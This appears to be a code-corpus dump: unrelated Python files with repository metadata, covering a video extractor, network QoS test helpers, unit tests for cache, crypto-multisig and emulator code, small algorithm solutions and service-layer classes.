'title': 'Citroën Grand C4 Picasso 2013 : présentation officielle',
'description': 'Vidéo officielle du nouveau Citroën Grand C4 Picasso, lancé à l\'automne 2013.',
},
'params': {
# Sometimes wat serves the whole file with the --test option
'skip_download': True,
},
}, {
'url': 'http://www.tfou.fr/chuggington/videos/le-grand-mysterioso-chuggington-7085291-739.html',
'info_dict': {
'id': 'le-grand-mysterioso-chuggington-7085291-739',
'ext': 'mp4',
'title': 'Le grand Mystérioso - Chuggington',
'description': 'Le grand Mystérioso - Emery rêve qu\'un article lui soit consacré dans le journal.',
'upload_date': '20150103',
},
'params': {
# Sometimes wat serves the whole file with the --test option
'skip_download': True,
},
'skip': 'HTTP Error 410: Gone',
}, {
'url': 'http://www.tf1.fr/tf1/koh-lanta/videos/replay-koh-lanta-22-mai-2015.html',
'only_matching': True,
}, {
'url': 'http://lci.tf1.fr/sept-a-huit/videos/sept-a-huit-du-24-mai-2015-8611550.html',
'only_matching': True,
}, {
'url': 'http://www.tf1.fr/hd1/documentaire/videos/mylene-farmer-d-une-icone.html',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
wat_id = self._html_search_regex(
r'(["\'])(?:https?:)?//www\.wat\.tv/embedframe/.*?(?P<id>\d{8})\1',
webpage, 'wat id', group='id')
return self.url_result('wat:%s' % wat_id, 'Wat')
|
[
"moritzlode@gmail.com"
] |
moritzlode@gmail.com
|
256a78690243b47369486b84acba56ba650f403c
|
4131625553ff59b4c730ae7148dd5d603d8cb87d
|
/hackerEarth/challenges/iitKanpurFreshersProgrammingContest2016/pokeluck.py
|
30419fb90a7798a46de3e00cf2d4155fda419afc
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
odonnmi/learnNPractice
|
29034304303aab3827e6b3334b1d7d9d65b93e54
|
eb1c775e4d6e35cebb7b109b46b91f9aecb2d9ec
|
refs/heads/master
| 2020-12-04T14:52:00.520219
| 2019-09-03T06:30:03
| 2019-09-03T06:30:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,781
|
py
|
# Pokeluck
#######################################################################################################################
#
# Mewtwo is one of the rarest and most famous pokemons in thw pokemon world. If any pokemon gets to fight with
# Mewtwo, he is considered to be "1-lucky". A pokemon that gets to fight with the pokemon who has fought with
# Mewtwo is considered to be "2-lucky", and so on.
#
# The Luckiness is defined on the basis of above mentioned rule. ( 1-Lucky -> Luckiness = 1).
#
# Note1: Consider luckiness of Mewtwo to be 0 .
#
# Note2: No one has negative luckiness.
#
# Note3: If a pokemon A is not Mewtwo himself, and has battled with someone with luckiness X, and has not battled
# with anyone with Luckiness smaller than X, then A has luckiness X+1 .
#
# Note4: It is ensured that every pokemon has finite positive luckiness.
#
# Input:
#
# The first line has two numbers: A,number of pokemons being considered and B, number of pokemon battles
# that have happened.
#
# Then B lines follow, each containing two distinct pokemons, denoting that the two pokemons have battled.
# Pokemons are represented by numbers between 1 and A.
#
# Mewtwo is represented by 1.
#
# Output Format:
#
# Output A-1 lines , ith line containing the luckiness of ith pokemon. (2 <= i <= A)
#
# Constraints:
#
# A <= 1000
#
# B <= (A(A-1))/2 ]
#
#######################################################################################################################
# Input
#
# 3 2
# 1 2
# 2 3
#######################################################################################################################
# Output
#
# 1
# 2
#######################################################################################################################
|
[
"sagarnikam123@gmail.com"
] |
sagarnikam123@gmail.com
|
e4d0583561a6158725a236905afe2fbba09c6263
|
d1ad901e1e926d9c92ce4dc7a7ba3c6ee91a65e2
|
/spytest/apis/qos/qos.py
|
c4158600f29cdeb92e9d1a8b3ac6ac00fa192bab
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
SubhajitPalKeysight/sonic-mgmt
|
ff59c2c5baf53cc2575aea2d541278fc9cf56977
|
e4b308a82572996b531cc09cbc6ba98b9bd283ea
|
refs/heads/master
| 2022-12-31T01:03:47.757864
| 2020-10-15T11:04:37
| 2020-10-15T11:04:37
| 286,815,154
| 1
| 1
|
NOASSERTION
| 2020-08-11T18:08:34
| 2020-08-11T18:08:33
| null |
UTF-8
|
Python
| false
| false
| 5,034
|
py
|
import re
from spytest.utils import filter_and_select
from spytest import st
import json
def verify_qos_queue_counters(dut,port,queue_name,param_list,val_list,tol_list):
'''
verifies QOS queue counters in the CLI show qos queue counters
:param dut: Device name where the command to be executed
:type dut: string
:param port: interface name to be checked
:type dut: string
:param queue_name: queue name to be checked
:type dut: string
:param param_list: list of params to be verified; example ['pkts_count', 'pkts_drop']
:param val_list: list of expected values for the params specified; example ['10000','5000']
:param tol_list: tolerence value for each param while comparing; for example ['1000', '500']
:return: True/False True - success case; False - Failure case
usage: verify_qos_queue_counters(dut1,'Ethernet0','UC0',['pkts_count', 'pkts_drop'],
['10000','5000'],['1000', '500'])
verify_qos_queue_counters(dut1,'Ethernet0','UC0',['pkts_count'],['10000'],['1000'])
Created by: Julius <julius.mariyan@broadcom.com
'''
success = True
cli_out = st.show(dut,'show queue counters {}'.format(port))
fil_out = filter_and_select(cli_out, param_list, {"port" : port, "txq" : queue_name})
if not fil_out:
st.error('port: {} and queue name: {} not found in output: {}'.format(port,queue_name,cli_out))
return False
else:
fil_out = fil_out[0]
for param,val,tol in zip(param_list,val_list,tol_list):
try:
fil_out[param] = re.sub(",","",fil_out[param])
int(fil_out[param])
except ValueError:
st.error('cannot get integer value from obtained string: {}'.format(fil_out[param]))
return False
if int(fil_out[param])<=int(val)+int(tol) and int(fil_out[param])>=int(val)-int(tol):
st.log('obtained value: {} is in the range b/w {} and {} as expected for param: {}'
'in queue: {}'.format(int(fil_out[param]),int(val)-int(tol),
int(val)+int(tol),param,queue_name))
else:
st.error('obtained value: {} is NOT in the range b/w {} and {} for param: {}'
'in queue: {}'.format(int(fil_out[param]), int(val) - int(tol),
int(val) + int(tol), param, queue_name))
success = False
return True if success else False
def clear_qos_queue_counters(dut):
'''
:param dut: DUT name where CLI to be executed
:type dut: string
:return: True/False True - Success ; False - Failure
usage:
clear_qos_queue_counters(dut1)
Created by: Julius <julius.mariyan@broadcom.com
'''
return True if st.show(dut,'show queue counters --clear',skip_tmpl=True) else False
def bind_qos_map_port(dut, map_name, obj_name, interface):
'''
:param dut: device to be configured
:type dut: string
:param map_name: qos map name for example dscp_to_tc_map, tc_to_queue_map
:type map_name: string
:param obj_name: object name for example AZURE
:type obj_name: string
:param interface: interface to be associated for example Ethernet1
:type interface: string
:return: True/False True - Success ; False - Failure
usage:
bind_qos_map_port(dut1, "tc_to_queue_map", "Azure", "Ethernet0")
bind_qos_map_port(dut1, "dscp_to_tc_map", "Azure", "Ethernet2")
bind_qos_map_port(dut1, "tc_to_pg_map", "Azure", "Ethernet72")
Created by: Julius <julius.mariyan@broadcom.com
'''
final_data, temp_data = dict(), dict()
data = { map_name : "[" + map_name.upper() + "|" + obj_name + "]"}
temp_data[interface] = data
final_data['PORT_QOS_MAP'] = temp_data
data_json = json.dumps(final_data)
return st.apply_json(dut, data_json)
def clear_qos_config(dut):
'''
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
Clears all the QOS realted config from the device
:param dut:
:return:
'''
command = "config qos clear"
st.config(dut, command)
def create_qos_json(dut, block_name, sub_block, dict_input):
'''
:param dut: device to be configured
:type dut: string
:param block_name: name of the field in json, for eg: dscp_to_tc_map, tc_to_queue_map, wred_profile etc
:type block_name: string
:param sub_block: sub field name, for eg: AZURE, AZURE_LOSSLESS etc
:type sub_block: string
:param dict_input: input values in dictionary
:type dict_input: string
:return: True/False True - Success ; False - Failure
usage:
create_qos_json(dut1, "tc_to_queue_map", "Azure", {"wred_green_enable" : "true"})
Created by: Julius <julius.mariyan@broadcom.com
'''
final_data, temp_data = dict(), dict()
temp_data[sub_block] = dict_input
final_data[block_name.upper()] = temp_data
final_data = json.dumps(final_data)
return st.apply_json(dut, final_data)
|
[
"noreply@github.com"
] |
SubhajitPalKeysight.noreply@github.com
|
6585fb31b416dfd35f83c956c594528d69b6d742
|
3fe5046326c0e6a63b9de6ab4de8f094f1e49614
|
/bin/indent-ged
|
165c4adbf540abe1e9a436dfd7f6e341711abfa8
|
[] |
no_license
|
dave-shawley/ged-work
|
cc7d6b71a58e3ac05d94177c018efe969fc60e0d
|
1edc7d6c2b871d65668a7ec347a42d3727e615d1
|
refs/heads/master
| 2020-03-23T22:01:52.407922
| 2019-04-21T14:33:06
| 2019-04-21T14:33:06
| 142,148,536
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 236
|
#!/usr/bin/env python
#
import sys
with open(sys.argv[1], 'r+') as f:
lines = f.readlines()
f.seek(0)
for line in lines:
indent, rest = line.split(None, 1)
f.write('\t' * int(indent))
f.write(line)
|
[
"daveshawley@gmail.com"
] |
daveshawley@gmail.com
|
|
cefb634734daaaddf09a98024d5ec5e44fb354b5
|
edb88981aa1420af7e074068ed7818b9d904a3dd
|
/tags/release-0.4.2/minds/test/test_cachefile.py
|
550d17ef92064fd5da222650ab9c462809cf2eb8
|
[] |
no_license
|
BackupTheBerlios/mindretrieve-svn
|
101c0f1dfc25d20d5f828b6fd0d43301b773af4e
|
463745fcf1c1d5b1f6c201c30bcc339c99b437ed
|
refs/heads/master
| 2021-01-22T13:57:31.225772
| 2006-04-28T04:24:43
| 2006-04-28T04:24:43
| 40,801,743
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,722
|
py
|
"""
"""
import os, os.path, sys
import unittest
from config_help import cfg
from minds import cachefile
class TestCacheFile(unittest.TestCase):
FILE1 = 'testcache'
def setUp(self):
self.pathname = os.path.join(cfg.getPath('logs'), self.FILE1)
self.cleanup()
def tearDown(self):
self.cleanup()
def cleanup(self):
# hardcode path to avoid deleting real data in config goof
try: os.remove('testlogs/' + self.FILE1 + '.mlog')
except OSError: pass
try: os.remove('testlogs/' + self.FILE1 + '.qlog')
except OSError: pass
def test_write(self):
c = cachefile.CacheFile(10)
c.write('hello')
self.assert_(not c.isOverflow())
c.write('how are you?')
self.assert_(c.isOverflow())
self.assert_(not os.path.exists(self.pathname+'.qlog'))
self.assert_(not os.path.exists(self.pathname+'.mlog'))
c.write_qlog(self.FILE1)
self.assert_(os.path.exists(self.pathname+'.qlog'))
self.assert_(os.path.getsize(self.pathname+'.qlog'),5)
c.write_mlog(self.FILE1)
self.assert_(os.path.exists(self.pathname+'.mlog'))
self.assert_(os.path.getsize(self.pathname+'.mlog'),5)
def test_discard(self):
c = cachefile.CacheFile(10)
c.write('hello')
self.assert_(not c.isOverflow())
c.write('how are you?')
self.assert_(c.isOverflow())
c.discard()
self.assert_(not os.path.exists(self.pathname+'.qlog'))
self.assert_(not os.path.exists(self.pathname+'.mlog'))
if __name__ == '__main__':
unittest.main()
|
[
"tungwaiyip@785ff9d5-dded-0310-b5f2-a5aff206d990"
] |
tungwaiyip@785ff9d5-dded-0310-b5f2-a5aff206d990
|
788e4f26f9ce4a49e8009089a81dd509608996ca
|
1c527a1944264784ba6ed237a723376bdee47f02
|
/src/utl/strip_csv.py
|
0c3dc9fa82235b03ec8b3ca868c5a6d64b12ed89
|
[] |
no_license
|
mikegleen/modes
|
3544517467b77ddb21ec50c2a624b98e0a7ea308
|
e77c89f28c623ce8fd30d7727a1b914461c6a0fd
|
refs/heads/master
| 2023-09-03T15:10:26.931110
| 2023-08-27T07:31:42
| 2023-08-27T07:31:42
| 139,562,349
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 499
|
py
|
"""
For each cell in a CSV file, strip leading and trailing whitespace.
"""
import codecs
import csv
import sys
def main():
incsv = codecs.open(sys.argv[1], 'r', 'utf-8-sig')
outcsv = codecs.open(sys.argv[2], 'w', 'utf-8-sig')
outwriter = csv.writer(outcsv)
for row in csv.reader(incsv):
for column in range(len(row)):
row[column] = row[column].strip() if row[column] else row[column]
outwriter.writerow(row)
if __name__ == '__main__':
main()
|
[
"mike.gleen@gmail.com"
] |
mike.gleen@gmail.com
|
08a13407b68ca6cda24394e7cdfc4eb4314bec1e
|
bc64931a5cdfed6d54a8d8828e9b9d4510d7a998
|
/test/multisig/commands/create_multisig_address_test.py
|
83ae9dbd6d76cdcf5210d0bea2085f4dc26f7cac
|
[
"MIT"
] |
permissive
|
valentinlehuger/iota.lib.py
|
4b9ddfda9c283b4fde6d9ba6ab5d6c1add5cd920
|
e345de981829a36ceaccf3862835c0dd28486950
|
refs/heads/master
| 2021-01-19T12:26:09.709236
| 2017-07-16T01:19:39
| 2017-07-16T01:19:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,866
|
py
|
# coding=utf-8
from __future__ import absolute_import, division, print_function, \
unicode_literals
from unittest import TestCase
import filters as f
from filters.test import BaseFilterTestCase
from iota import TryteString
from iota.adapter import MockAdapter
from iota.crypto.types import Digest
from iota.filters import Trytes
from iota.multisig import MultisigIota
from iota.multisig.commands import CreateMultisigAddressCommand
from iota.multisig.types import MultisigAddress
from six import binary_type, text_type
class CreateMultisigAddressCommandTestCase(TestCase):
# noinspection SpellCheckingInspection
def setUp(self):
super(CreateMultisigAddressCommandTestCase, self).setUp()
self.adapter = MockAdapter()
self.command = CreateMultisigAddressCommand(self.adapter)
# Define some tryte sequences that we can reuse between tests.
self.digest_1 =\
Digest(
trytes =
b'FWNEPVJNGUKTSHSBDO9AORBCVWWLVXC9KAMKYYNKPYNJDKSAUURI9ELKOEEYPKVTYP'
b'CKOCJQESYFEMINIFKX9PDDGRBEEHYYXCJW9LHGWFZGHKCPVDBGMGQKIPCNKNITGMZT'
b'DIWVUB9PCHCOPHMIWKSUKRHZOJPMAY',
key_index = 0,
)
self.digest_2 =\
Digest(
trytes =
b'PAIRLDJQY9XAUSKIGCTHRJHZVARBEY9NNHYJ9UI9HWWZXFSDWEZEGDCWNVVYSYDV9O'
b'HTR9NGGZURISWTNECFTCMEWQQFJ9VKLFPDTYJYXC99OLGRH9OSFJLMEOGHFDHZYEAF'
b'IMIZTJRBQUVCR9U9ZWTMUXTUEOUBLC',
key_index = 0,
)
def test_wireup(self):
"""
Verify that the command is wired up correctly.
"""
self.assertIsInstance(
MultisigIota(self.adapter).createMultisigAddress,
CreateMultisigAddressCommand,
)
def test_happy_path(self):
"""
Generating a multisig address.
"""
result = self.command(digests=[self.digest_1, self.digest_2])
# noinspection SpellCheckingInspection
self.assertDictEqual(
result,
{
'address':
MultisigAddress(
trytes =
b'JUIFYSUQFVBFGNHOJMLWBHMGASFGBPAUMRZRRCJF'
b'CCOJHJKZVUOCEYSCLXAGDABCEWSUXCILJCGQWI9SF',
digests = [self.digest_1, self.digest_2],
),
},
)
class CreateMultisigAddressRequestFilterTestCase(BaseFilterTestCase):
filter_type = CreateMultisigAddressCommand(MockAdapter()).get_request_filter
skip_value_check = True
# noinspection SpellCheckingInspection
def setUp(self):
super(CreateMultisigAddressRequestFilterTestCase, self).setUp()
# Define some tryte sequences that we can reuse between tests.
self.digest_1 =\
Digest(
trytes =
b'FWNEPVJNGUKTSHSBDO9AORBCVWWLVXC9KAMKYYNKPYNJDKSAUURI9ELKOEEYPKVTYP'
b'CKOCJQESYFEMINIFKX9PDDGRBEEHYYXCJW9LHGWFZGHKCPVDBGMGQKIPCNKNITGMZT'
b'DIWVUB9PCHCOPHMIWKSUKRHZOJPMAY',
key_index = 0,
)
self.digest_2 =\
Digest(
trytes =
b'PAIRLDJQY9XAUSKIGCTHRJHZVARBEY9NNHYJ9UI9HWWZXFSDWEZEGDCWNVVYSYDV9O'
b'HTR9NGGZURISWTNECFTCMEWQQFJ9VKLFPDTYJYXC99OLGRH9OSFJLMEOGHFDHZYEAF'
b'IMIZTJRBQUVCR9U9ZWTMUXTUEOUBLC',
key_index = 0,
)
def test_pass_happy_path(self):
"""
Request is valid.
"""
request = {
'digests': [self.digest_1, self.digest_2],
}
filter_ = self._filter(request)
self.assertFilterPasses(filter_)
self.assertDictEqual(filter_.cleaned_data, request)
def test_pass_compatible_types(self):
"""
Request contains values that can be converted to the expected
types.
"""
filter_ = self._filter({
# ``digests`` may contain any values that can be converted into
# :py:class:`Digest` objects.
'digests': [binary_type(self.digest_1), TryteString(self.digest_2)],
})
self.assertFilterPasses(filter_)
self.assertDictEqual(
filter_.cleaned_data,
{
'digests': [self.digest_1, self.digest_2],
},
)
def test_fail_empty(self):
"""
Request is empty.
"""
self.assertFilterErrors(
{},
{
'digests': [f.FilterMapper.CODE_MISSING_KEY],
},
)
def test_fail_unexpected_parameters(self):
"""
Request contains unexpected parameters.
"""
self.assertFilterErrors(
{
'digests': [self.digest_1, self.digest_2],
# Oh, and I suppose that's completely inconspicuous.
'foo': 'bar',
},
{
'foo': [f.FilterMapper.CODE_EXTRA_KEY],
},
)
def test_fail_digests_null(self):
"""
``digests`` is null.
"""
self.assertFilterErrors(
{
'digests': None,
},
{
'digests': [f.Required.CODE_EMPTY],
},
)
def test_fail_digests_wrong_type(self):
"""
``digests`` is not an array.
"""
self.assertFilterErrors(
{
'digests': self.digest_1,
},
{
'digests': [f.Array.CODE_WRONG_TYPE],
},
)
def test_fail_digests_empty(self):
"""
``digests`` is an array, but it's empty.
"""
self.assertFilterErrors(
{
'digests': [],
},
{
'digests': [f.Required.CODE_EMPTY],
},
)
def test_fail_digests_contents_invalid(self):
"""
``digests`` is an array, but it contains invalid values.
"""
self.assertFilterErrors(
{
'digests': [
b'',
True,
None,
b'not valid trytes',
# This is actually valid; I just added it to make sure the
# filter isn't cheating!
TryteString(self.digest_1),
2130706433,
],
},
{
'digests.0': [f.Required.CODE_EMPTY],
'digests.1': [f.Type.CODE_WRONG_TYPE],
'digests.2': [f.Required.CODE_EMPTY],
'digests.3': [Trytes.CODE_NOT_TRYTES],
'digests.5': [f.Type.CODE_WRONG_TYPE],
},
)
|
[
"phx@phx.ph"
] |
phx@phx.ph
|
eb7ae1ac126c5b743c4c5ef5c4ccf26c00e3fe0b
|
6468584be4f1400ca18dabe59a5c0f05e1f45b03
|
/dsl/features/create_ngram_matrix.py
|
6e9dd4263e7604fd6bf0246dd03e788605d20f6d
|
[
"MIT"
] |
permissive
|
juditacs/dsl
|
824e04e77d7bf44aab7e0b820b3f36fea9f09e87
|
d6212cb2ff0755ceed8f37ee2f80ab47c9dc780c
|
refs/heads/master
| 2021-01-14T13:21:52.215072
| 2020-04-16T09:32:02
| 2020-04-16T09:32:02
| 35,669,552
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,825
|
py
|
from sys import argv, stderr
import cPickle
from featurize import Tokenizer, Featurizer
from dsl.representation.model import Representation
def main():
N = int(argv[1]) if len(argv) > 1 else 3
t = Tokenizer(filter_punct=True, ws_norm=True, strip=True, replace_digits=True)
f = Featurizer(t, N=N)
f.featurize_in_directory(argv[2])
stderr.write('Featurized\n')
#m = f.to_dok_matrix(docs)
f.get_correlations()
stderr.write('Means computed\n')
f.label_feat_pearson()
stderr.write('Correlations computed\n')
cut = int(argv[4]) if len(argv) > 4 else 40
f.filter_top_ngrams(cut)
stderr.write('Top ngrams filtered\n')
f.save_features('train_features')
mtx = f.to_dok_matrix()
with open('train_mtx.cPickle', 'wb') as fh:
cPickle.dump((f.labels.l, mtx), fh, -1)
stderr.write('Data read\n')
stderr.write('Trained\n')
test_f = Featurizer(t, N=N)
test_f.featdict = f.featdict
test_f.featdict.freeze_dict()
test_f.featurize_in_directory(argv[3])
docs = test_f.filter_ngrams(test_f.docs, f.topngrams)
test_f.docs = docs
test_f.topngrams = f.topngrams
test_f.save_features('test_features')
test_f.featdict.save('topfeatures')
test_mtx = test_f.to_dok_matrix()
with open('test_mtx.cPickle', 'wb') as fh:
cPickle.dump((test_f.labels.l, test_mtx), fh, -1)
acc = 0
stderr.write('Test matrix done\n')
r = Representation('dummy', 'svm', svm_ktype='svc')
r.encode(mtx)
stderr.write('Encoded\n')
r.train_classifier(f.labels.l)
for i in xrange(test_mtx.shape[0]):
gold = test_f.labels.l[i]
cl = r.classify_vector(test_mtx.getrow(i).todense())[0]
if gold == cl:
acc += 1
print float(acc) / test_mtx.shape[0]
if __name__ == '__main__':
main()
|
[
"judit@sch.bme.hu"
] |
judit@sch.bme.hu
|
4f31d3739a8a0169184bb538944118b6f95aec4a
|
fd4df5cf34f8427153bf01d25c39ded9315b8d6a
|
/tests/test_ram.py
|
7a12aff7cec9d97af7a57edbc2623b3b2f0b1518
|
[
"BSD-2-Clause"
] |
permissive
|
jepebe/nes
|
9ac00e89cf474b7811020d18bf7fd8f15b556339
|
79e6ad689473b7a3a4f3b6d7cf2c381220fcf140
|
refs/heads/master
| 2023-01-05T22:38:30.714836
| 2020-10-26T07:33:10
| 2020-10-26T07:33:10
| 300,615,959
| 1
| 1
| null | 2020-10-26T07:33:11
| 2020-10-02T13:01:36
|
Python
|
UTF-8
|
Python
| false
| false
| 567
|
py
|
from nes.bus import Bus
class TestCartridge:
def cpu_write(self, addt, value):
return None
def cpu_read(self, addr):
return None
def test_ram():
bus = Bus()
bus.insert_cartridge(TestCartridge())
for addr in range(0x0000, 0x800):
bus.cpu_write(addr, 0xff)
assert bus.cpu_read(addr) == 0xff
bus.cpu_write(0x700, 0x7f)
assert bus.cpu_read(0x700) == 0x7f
assert bus.cpu_read(0x700 + 0x800) == 0x7f
assert bus.cpu_read(0x700 + 0x800 * 2) == 0x7f
assert bus.cpu_read(0x700 + 0x800 * 3) == 0x7f
|
[
"jepebe@users.noreply.github.com"
] |
jepebe@users.noreply.github.com
|
af1f62d0bf863e6597fbe007f00340142d4450ce
|
16b2c2365eff11f34ae260321e6dde78ab09b45d
|
/api/api_services/PersonService.py
|
14c5f4056460582f3abd2dd4a7f5dc56475455ed
|
[] |
no_license
|
laken11/TMS
|
bf941802e350a16db0f2314330ad315e73ce48f0
|
c271f2cbb1624ab943c10bacaa6406ec8ca08083
|
refs/heads/dev
| 2023-04-27T22:03:38.811267
| 2021-05-08T12:06:54
| 2021-05-08T12:06:54
| 362,518,465
| 0
| 0
| null | 2021-05-05T10:07:54
| 2021-04-28T15:27:28
|
Python
|
UTF-8
|
Python
| false
| false
| 1,823
|
py
|
from abc import ABCMeta, abstractmethod
from typing import List
from api.api_dto.PersonDto import *
from api.api_repository.PersonRepository import PersonRepository
class PersonManagementService(metaclass=ABCMeta):
@abstractmethod
def create_person(self, model: CreatePersonDto):
"""Create a person object"""
raise NotImplementedError
@abstractmethod
def update_person(self, person_id, model: UpdatePersonDto):
"""Update a person object"""
raise NotImplementedError
@abstractmethod
def list_person(self) -> List[ListPersonDto]:
"""List all person objects"""
raise NotImplementedError
@abstractmethod
def person_details(self, person_id, model: PersonDetailsDto):
"""Details of a person object"""
raise NotImplementedError
@abstractmethod
def update_person_role(self, person_id, model: UpdatePersonRoleDto):
"""Updating a person role"""
raise NotImplementedError
class DefaultPersonManagementService(PersonManagementService):
repository: PersonRepository
def __init__(self, repository: PersonRepository):
self.repository = repository
def create_person(self, model: CreatePersonDto):
return self.repository.create_person(model=model)
def update_person(self, person_id, model: UpdatePersonDto):
return self.update_person(person_id=person_id, model=model)
def list_person(self) -> List[ListPersonDto]:
return self.repository.list_person()
def person_details(self, person_id, model: PersonDetailsDto):
return self.repository.person_details(person_id=person_id, model=model)
def update_person_role(self, person_id, model: UpdatePersonRoleDto):
return self.repository.update_person_role(person_id=person_id, model=model)
|
[
"omitogunopeyemi@gmail.com"
] |
omitogunopeyemi@gmail.com
|
7fc48ac64107c97a8357f111ccd641bcaaf880af
|
aca01c2d073cc9ca2b71e12b8ed87a13a3d61438
|
/design-patterns/src/iterators-ksiazka-adresowa.py
|
bed9ad1fa41d7eb0c99cdd60435c1395e01f065b
|
[
"MIT"
] |
permissive
|
sli1989/book-python
|
ee2ee0f37b3173b6921db722a4cb2593d6df1f2b
|
51ea279bcc26c4b9b8a1d726e2683c019a28d62b
|
refs/heads/master
| 2020-04-15T11:39:07.209256
| 2019-01-06T23:27:55
| 2019-01-06T23:27:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 792
|
py
|
class Kontakt:
def __init__(self, imie, nazwisko, adresy=[]):
self.imie = imie
self.nazwisko = nazwisko
self.adresy = adresy
class Adres:
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
kontakt = Kontakt(imie='Pan', nazwisko='Twardowski', adresy=[
Adres(ulica='2101 E NASA Pkwy', miasto='Houston', stan='Texas',
kod='77058', panstwo='USA'),
Adres(ulica=None, miasto='Kennedy Space Center', kod='32899',
panstwo='USA'),
Adres(ulica='4800 Oak Grove Dr', miasto='Pasadena', kod='91109',
panstwo='USA'),
Adres(ulica='2825 E Ave P', miasto='Palmdale', stan='California',
kod='93550', panstwo='USA'),
])
for adres in kontakt:
print(adres)
|
[
"matt@astrotech.io"
] |
matt@astrotech.io
|
d8074cdceef3099fac3b9fe5188dce7732392b2d
|
c8efab9c9f5cc7d6a16d319f839e14b6e5d40c34
|
/source/Clarification/Backtracking/生成括号.py
|
79c4cbc77e31405a0b2e94b1f993c9dc312741f0
|
[
"MIT"
] |
permissive
|
zhangwang0537/LeetCode-Notebook
|
73e4a4f2c90738dea4a8b77883b6f2c59e02e9c1
|
1dbd18114ed688ddeaa3ee83181d373dcc1429e5
|
refs/heads/master
| 2022-11-13T21:08:20.343562
| 2020-04-09T03:11:51
| 2020-04-09T03:11:51
| 277,572,643
| 0
| 0
|
MIT
| 2020-07-06T14:59:57
| 2020-07-06T14:59:56
| null |
UTF-8
|
Python
| false
| false
| 685
|
py
|
# 给出 n 代表生成括号的对数,请你写出一个函数,使其能够生成所有可能的并且有效的括号组合。
#
# 例如,给出 n = 3,生成结果为:
#
# [
# "((()))",
# "(()())",
# "(())()",
# "()(())",
# "()()()"
# ]
class Solution:
def generateParenthesis(self, n: int) -> List[str]:
ans = []
def backtrack(s='',left=0,right=0):
if len(s) == 2 * n:
ans.append(s)
return
if left < n:
backtrack(s+'(',left+1,right)
if right < left:
backtrack(s+')',left,right+1)
backtrack()
return ans
|
[
"mzm@mail.dlut.edu.cn"
] |
mzm@mail.dlut.edu.cn
|
309933581c5906d2db8e8db38c4eb5949f694987
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03157/s868052818.py
|
ec6805ad1b92df0a841e5a07b2af49a175993650
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,370
|
py
|
from collections import defaultdict
H, W = map(int, input().split())
S = [input() for _ in range(H)]
es = defaultdict(list)
# あるマスについて左右見なくても右に向かってみていけば逆もとれる
for i in range(H):
for j in range(W):
if j < W-1 and S[i][j] != S[i][j+1]:
es[(i,j)].append((i,j+1))
es[(i,j+1)].append((i,j))
if i < H-1 and S[i][j] != S[i+1][j]:
es[(i,j)].append((i+1, j))
es[(i+1,j)].append((i, j))
checked = [[False for _ in range(W)] for H in range(H)]
ans = 0
for i in range(H):
for j in range(W):
if checked[i][j] == True:
continue
cnt_b = 0
cnt_w = 0
if S[i][j] == "#":
cnt_b += 1
else:
cnt_w += 1
checked[i][j] = True
stack = es[(i,j)]
while stack:
new_stack = []
for p,q in stack:
if checked[p][q] == False:
checked[p][q] = True
if S[p][q] == "#":
cnt_b += 1
else:
cnt_w += 1
new_stack.extend(es[(p,q)])
if len(new_stack) == 0:
break
else:
stack = new_stack
ans += cnt_b * cnt_w
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
79db950c2f9450ff729d2ac03f6271965dd807cf
|
d5049c3b59b943a158389deaefe9c48970a43c6c
|
/Lab4/UI.py
|
e33e0458a9bc51d6e7bef9164a7954f72ed438a3
|
[] |
no_license
|
LauraDiosan-CS/lab04-gatsp-DiosDuck
|
18e013df30b1a8d0e182190c693cad7da47e68d1
|
647ae011fa5edf7ea4a4187b684f351b0482c328
|
refs/heads/master
| 2022-04-22T20:47:47.311060
| 2020-03-27T17:59:05
| 2020-03-27T17:59:05
| 250,198,244
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 801
|
py
|
from Service import Service
class UI():
def __init__(self):
self.__service=None
def main(self):
while 1:
try:
x = input()
if x == "0":
return
elif x == "1":
file=input()
self.__service=Service(file,1)
self.__service.prob1()
print("Functie terminata")
elif x == "2":
file=input()
self.__service=Service(file,2)
self.__service.prob1()
print("Functie terminata")
else:
print("Error")
except FileNotFoundError:
print("Fisierul nu exista")
|
[
"noreply@github.com"
] |
LauraDiosan-CS.noreply@github.com
|
eda7d59af2ae751d7b25d53cd82272fde7a20c7d
|
eb19175c18053e5d414b4f6442bdfd0f9f97e24d
|
/tests/contrib_django/test_converter.py
|
8c04699773df54369df8be04d36665643a5f9a55
|
[
"MIT"
] |
permissive
|
jhgg/graphene
|
6c4c5a64b7b0f39c8f6b32d17f62e1c31ca03825
|
67904e8329de3d69fec8c82ba8c3b4fe598afa8e
|
refs/heads/master
| 2020-12-25T21:23:22.556227
| 2015-10-15T19:56:40
| 2015-10-15T19:56:40
| 43,073,008
| 1
| 0
| null | 2015-09-24T14:47:19
| 2015-09-24T14:47:19
| null |
UTF-8
|
Python
| false
| false
| 3,521
|
py
|
from py.test import raises
from collections import namedtuple
from pytest import raises
import graphene
from graphene import relay
from graphene.contrib.django.converter import (
convert_django_field
)
from graphene.contrib.django.fields import (
ConnectionOrListField,
DjangoModelField
)
from django.db import models
from .models import Article, Reporter
def assert_conversion(django_field, graphene_field, *args):
